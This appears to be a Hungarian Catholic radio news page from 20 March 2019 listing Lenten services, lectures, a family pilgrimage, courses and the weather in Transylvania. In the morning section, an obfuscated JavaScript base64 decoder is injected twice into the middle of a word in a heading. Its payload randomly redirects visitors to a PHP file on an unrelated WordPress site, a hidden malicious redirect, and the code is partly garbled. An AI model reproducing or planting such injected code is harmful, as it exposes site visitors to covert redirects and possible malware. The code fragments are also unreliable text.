2019. március 20. – Hírek és programajánló

H Í R E K   D É L B E N

Szent Benedek-búcsú
A sepsiszentgyörgyi Szent Be­nedek-plébániatemplom (Ál­lo­más negyed) búcsúját holnap tartják. Délután 5 órakor román nyelven, 6 órakor pedig magyar nyelven mutatják be az ünnepi szentmisét. Mindkét szentmisén Gödri István feketehalmi plébános prédikál.

A Joannes Kájoni 390 emlékév megnyitója Csíksomlyón
Március 21-én, holnap délután 6 órától Kájoni János születésének 390. évfordulója alkalmából emlékév kezdődik, melynek célja fokozottabb figyelmet irányítani Kájoni munkásságára.
Az emlékév megnyitója a csíksomlyói kegytemplomban szentmisével kezdődik. A szentmisén szolgálatot teljesítenek: Bíró János kántor és a Madéfalvi Schola Ványolós András és Ványolós Orsolya vezetésével.
A liturgiát zenei műsor követi Szabó András, Hunyadi Koppány, Lázár Zsombor, Ványolós András, Ványolós Orsolya, a Codex együttes és Györfi Erzsébet közreműködésével.

Előadás Csíkszeredában
A  Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, március 22-én, pénteken 18. órától Dr. Propper Valéria: Honfoglalás vagy hazatérés? címmel tart előadást a városháza gyűléstermében Csíkszeredában. Minden érdeklődőt várnak!

Belső iránytű Gyergyószentmiklóson
Folytatódik a Belső iránytű előadássorozat Gyergyőszentmiklóson, a Szent István plébánián. Március 22-én, pénteken este hét órától Dr Szabolcs Zoltán szívsebész  tart előadást A hit és a hivatás szimbiózisa a szívsebészetben címmel. Minden érdeklődőt várnak.

Triduum Kolozsváron
Március 22-24. között Kolozsváron, a Szent Mihály-plébániatemplomban nagyböjti triduum lesz. Az este 6 órakor kezdődő szentmiséken az elmélkedéseket Sajgó Balázs, a Gyulafehérvári Főegyházmegyei Caritas lelki igazgatója tartja.

Márton Áron nyomában – Családos kirándulás Kolozsvárról
A kolozsvári Szent Mihály plébánia szervezésében Márton Áron családos kirándulás lesz március 23-24. között.
Az indulás március 23-án, szombaton reggel 7 órakor a Szent Mihály-templom mögötti BRD bank elől (a KFC mellett). Első állomás Szászrégen, utána Gyergyóditró, Csíkszentdomokos, Csíkdánfalva és végül Csíksomlyó. Vasárnap reggeli után 7 órakor indulás Máramarosszigetre majd onnan Kolozsvárra.
Jelentkezni még a mai nap folyamán lehet a 0749 993 285-ös telefonszámon vagy csiki.beata02@gmail.com e-mail címen.

Fogadalmat újítanak a Mária Légió tagjai
Március 23-án, szombaton a székelyudvarhelyi Szent Miklós-plébániatemplomban a délelőtt 10 órakor kezdődő szentmisén tartják a Mária Légió évenkénti ünnepségét, az Aciest, amelynek keretében megújítják fogadalmukat.

Családos lelkinap Zimándújfalun
Március 23-án, szombaton a zimándújfalui római katolikus plébánián családos lelkinapot tartanak magyar nyelven. A programban délelőtt 10 órakor Családapostolkodás címmel a nagyváradi Veres család előadása szerepel, azt követően kerekasztal beszélgetésre és kiscsoportos tevékenységre kerül sor. Ebéd után, 14 órakor megosztó kör és kiértékelés, 15:15 órakor családok keresztútja és gyónási alkalom lesz. A találkozó záró szentmiséjét 16 órakor Pál József Csaba megyéspüspök mutatja be. A programok alatt a gyermekekkel külön foglalkozást tartanak. Várnak minden érdeklődőt!

Szentmise Gyulafehérváron
Március 24-én és 25-én Gyulafehérváron találkoznak a Seminarium Incarnatæ Sapientiæ szemináriumot fenntartó püspökök. A Gyulafehérvári Hittudományi Főiskola és Papnevelő Intézet kápolnájának búcsúünnepén, március 25-én, Gyümölcsoltó Boldogasszony napján a szentmisét 9 órakor Pál József Csaba megyéspüspök mutatja be. A búcsús szentmisét követően a szemináriumot fenntartó püspökök a tanintézet elöljáróival és a tantestülettel közös megbeszélésen vesznek részt.

Jézus lábainál ülve
Március 30-án, szombaton Marosvásárhelyen a Remeteszegi Szent Család plébánián, nagyböjti imanapot tart a Marosvásárhelyi Imádság Háza reggel fél tíztől. Az imanapon, melynek mottója, Jézus lábainál ülve, tanításokkal, dicsőítésekkel, közös és személyes imaidőkkel várnak minden érdeklődőt!

Ifjúsági lelkinap Karánsebesen
Április 6-án, szombaton 10 órai kezdettel a Karánsebesi Római Katolikus Plébánián nagyböjti ifjúsági lelkinapot tartanak, amelyre a hegyvidéki főesperesség fiataljait várják. Az érdeklődők további információkat Matieș Marin karánsebesi plébánostól kaphatnak marinmaties@yahoo.com e-mail címen és a 0255-512902 telefonszámon.

Időjárás: Március 20-án kezdetét veszi a csillagászati tavasz, azaz ma van a tavaszi napéjegyenlőség. Egy ideje már érezhetően hosszabbodnak a nappalok. Ma sok napsütésre van kilátás, de emellett az Erdélyi medence térségében, keleten és délen csapadék is várható. Az északi-északkeleti szél még többfelé élénk, helyenként erős lehet. Délután 8-14 fokra készülhetünk.

MRE – Hírszolgálat, 2019. március 20.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a   küküllőkeményfalvi templomban tartják az örökös szentségimádási napot. Nagyböjt folyamán járuljunk gyakrabban az Oltáriszentségben jelen levő Krisztus elé, engeszteljük Őt bűneinkért és engedjük, hogy jelenléte formáljon, megtisztítson bennünket.

Állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentségimádás Marosvásárhelyen és Margittán
A marosvásárhelyi Keresztelő Szent János-plébániatemplomban hamvazószerdától kezdődően egész nagyböjt folyamán állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentségimádást tartanak naponta 8-17 óra között. Várják a híveket, kapcsolódjanak be az imába, használják ezt a lehetőséget az elcsendesedésre, engesztelésre.
A margittai kistemplomban is folyamatos szentségimádás van a helység családjainak, fiataljainak és gyermekeink lelki megújulásáért. Mindenkit szeretettel hívnak és várnak imára a helyi lelkipásztorok hétfőtől péntekig, reggel 8 és délután 5 óra között.

Csendmeditáció Kolozsváron
Minden szerdán a nagyböjt folyamán a Kolozsváron élő szociális testvérek csendmeditációra kínálnak lehetőséget azok számára, akik ismerik ezt az imaformát és a nagyváros zajában szeretnének kicsit megállni, figyelni, jelen lenni Isten és önmaguk számára. Egy-egy alkalom rövid bevezető után 2-szer 25 perc csendes imából áll (a szünetben akár el is lehet menni vagy bejönni). Mindenkit várnak Kolozsváron, a Szentegyház utca 7 szám alatt, a Boldog Sára-teremben.

Előadás Csíkszeredában
A  Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, március 22-én, pénteken 18. órától Dr. Propper Valéria: Honfoglalás vagy hazatérés? címmel tart előadást a városháza gyűléstermében Csíkszeredában. Minden érdeklődőt várnak!

Nagyböjti lelkigyakorlat Székelyudvarhelyen
Március 22 és 23-ka között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban “Élj, szeress, álmodj, higgy!” címmel nagyböjti lelkigyakorlat lesz azoknak, akik közel érzik magukhoz a ferences lelkiséget, ahol a bűnbánat, öröm és szeretet találkozik. A lelkigyakorlatra előzetes bejelentkezés szükséges a 0266-210537 vagy a 0755-489743-as telefonszámokon, illetve a hazpio@gmail.com e-mail címen. Ma van az utolsó jelentkezési nap.

Márton Áron nyomában – Családos kirándulás Kolozsvárról
A kolozsvári Szent Mihály plébánia szervezésében Márton Áron családos kirándulás lesz március 23-24. között.
Az indulás március 23-án, szombaton reggel 7 órakor a Szent Mihály-templom mögötti BRD bank elől (a KFC mellett). Első állomás Szászrégen, utána Gyergyóditró, Csíkszentdomokos, Csíkdánfalva és végül Csíksomlyó. Vasárnap reggeli után 7 órakor indulás Máramarosszigetre majd onnan Kolozsvárra.
Jelentkezni még a mai nap folyamán lehet a 0749 993 285-ös telefonszámon vagy csiki.beata02@gmail.com e-mail címen.

Teljes Szívvel ifjúsági vezetőképzés Székelyudvarhelyen
Székelyudvarhely ad otthont a negyedik alkalommal megszervezésre kerülő nyolc hétvégéből álló Teljes Szívvel ifjúsági vezetőképzésnek. Az első találkozás március 29-31-ke között lesz megtartva. Jelentkezni március 22-ig lehet a tsz.fif.ma honlapon. Bővebb információk a 0746-239738-as telefonszámon kaphatók. A témával kapcsolatban még többet a mai Déli magazinban hallhatnak.

Bevezetés az okoseszközök használatába
A KALOT Egyesület okostelefon- és tabletfelhasználó tanfolyamot indít idősödők számára. A képzés mindazok számára hasznos, akik szeretnének megbarátkozni az okos eszközök – telefon, tablet – használatával, akik betekintést szeretnének nyerni a digitális technológia nyújtotta új kommunikációs, tájékozódási, szórakozási és ügyintézési módokba, lehetőségekbe. A tanfolyam április 1-től kezdődően, 7 héten át tart és heti 6 órás foglalkozást tartalmaz. Érdeklődni és jelentkezni a 0758-840279-es telefonszámon (8-12 óra között), vagy az kepzesek@kalot.ro e-mail címen lehet március 29-ig. A foglalkozásokhoz saját oktostelefon, tablet szükséges. A helyek száma korlátozott!

Fekete Madonna Zarándokvonat
Ismét elindul a Fekete Madonna Zarándokvonat Częstochowába, Lengyelországba a híres Jasna Góra-i Mária kegyhelyre. Az indulás június 24-én Budapestről, visszaérkezés június 27-én lesz. Erdélyből külön autóbuszokkal indulnak a vonathoz. Az idei vonatos zarándoklat lelki vezetői Márfi Gyula veszpérmi érsek, Tamás József püspök atya és Csóka János pálos tartományfőnök. Természetesen a vonatot több más lelkipásztor is elkíséri, akiknek szolgálatára számíthatnak a zarándokok. Jelentkezni és érdeklődni lehet Kovács Emesénél a 0740 047064-es telefonszámon.

Időjárás: Március 20-án kezdetét veszi a csillagászati tavasz, azaz ma van a tavaszi napéjegyenlőség. Egy ideje már érezhetően hosszabbodnak a nappalok. Ma ugyan néhol fagyos reggelre ébredtünk, viszont országszerte napos időre készülhetünk, de emellett az Erdélyi medence térségében, keleten és délen csapadék is várható. Az északi-északkeleti szél még többfelé élénk, helyenként erős lehet. Délután 8-14 fokra készülhetünk.

MRE - Hírszolgálat, 2019. március 20.

About the author

maradmin

Leave a Comment